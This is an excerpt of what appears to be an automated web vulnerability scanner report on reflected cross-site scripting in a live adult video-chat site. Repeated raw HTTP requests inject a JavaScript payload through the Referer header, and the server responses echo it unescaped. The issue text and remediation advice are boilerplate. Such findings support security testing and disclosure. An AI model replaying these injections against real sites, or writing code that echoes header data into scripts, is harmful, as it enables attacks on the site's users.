Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=38c58'-alert(1)-'c21d7feff7f
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:34 GMT
Connection: close
Content-Length: 51719
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/competitionspage.aspx&he=imlive.com&ul=/live-sex-chats/free-sex-video/&rf=http://www.google.com/search?hl=en^q=38c58'-alert(1)-'c21d7feff7f&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 375ba'-alert(1)-'7a67cb13099 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=375ba'-alert(1)-'7a67cb13099
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:05 GMT
Connection: close
Content-Length: 33567
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay-couple/&rf=http://www.google.com/search?hl=en^q=375ba'-alert(1)-'7a67cb13099&qs=cat=1^roomid=52&qs=cat=1^roomid=52&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2ca5e'-alert(1)-'e9dfbf1b8ea was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/gay/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=2ca5e'-alert(1)-'e9dfbf1b8ea
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:34 GMT
Connection: close
Content-Length: 195039
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ript type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/gay/&rf=http://www.google.com/search?hl=en^q=2ca5e'-alert(1)-'e9dfbf1b8ea&qs=cat=1^roomid=53&qs=cat=1^roomid=53&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5ad47'-alert(1)-'76a1a657857 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/guy-alone/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=5ad47'-alert(1)-'76a1a657857
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:48 GMT
Connection: close
Content-Length: 69840
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... ype="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/guy-alone/&rf=http://www.google.com/search?hl=en^q=5ad47'-alert(1)-'76a1a657857&qs=cat=1^roomid=54&qs=cat=1^roomid=54&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1502'-alert(1)-'6f19a081c72 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/happyhour/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=d1502'-alert(1)-'6f19a081c72
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:43 GMT
Connection: close
Content-Length: 22380
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... pe="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/happyhour.aspx&he=imlive.com&ul=/live-sex-chats/happyhour/&rf=http://www.google.com/search?hl=en^q=d1502'-alert(1)-'6f19a081c72&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b461'-alert(1)-'6f4815116d3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian-couple/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=8b461'-alert(1)-'6f4815116d3
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:22 GMT
Connection: close
Content-Length: 118812
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian-couple/&rf=http://www.google.com/search?hl=en^q=8b461'-alert(1)-'6f4815116d3&qs=cat=1^roomid=191&qs=cat=1^roomid=191&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7026c'-alert(1)-'0aae3d52806 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/lesbian/ HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;
Referer: http://www.google.com/search?hl=en&q=7026c'-alert(1)-'0aae3d52806
Response
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:19:47 GMT
Connection: close
Content-Length: 32900
Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/lesbian/&rf=http://www.google.com/search?hl=en^q=7026c'-alert(1)-'0aae3d52806&qs=cat=1^roomid=11&qs=cat=1^roomid=11&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( ty ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff204'-alert(1)-'8fd9da9f013 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /live-sex-chats/live-sex-video/ HTTP/1.1 Host: imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202; Referer: http://www.google.com/search?hl=en&q=ff204'-alert(1)-'8fd9da9f013
Response
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/ X-Powered-By: vsr48 Date: Fri, 28 Jan 2011 14:24:25 GMT Connection: close Content-Length: 25009 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d ...[SNIP]... javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/videoslibrary.aspx&he=imlive.com&ul=/live-sex-chats/live-sex-video/&rf=http://www.google.com/search?hl=en^q=ff204'-alert(1)-'8fd9da9f013&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined' ){ ...[SNIP]...
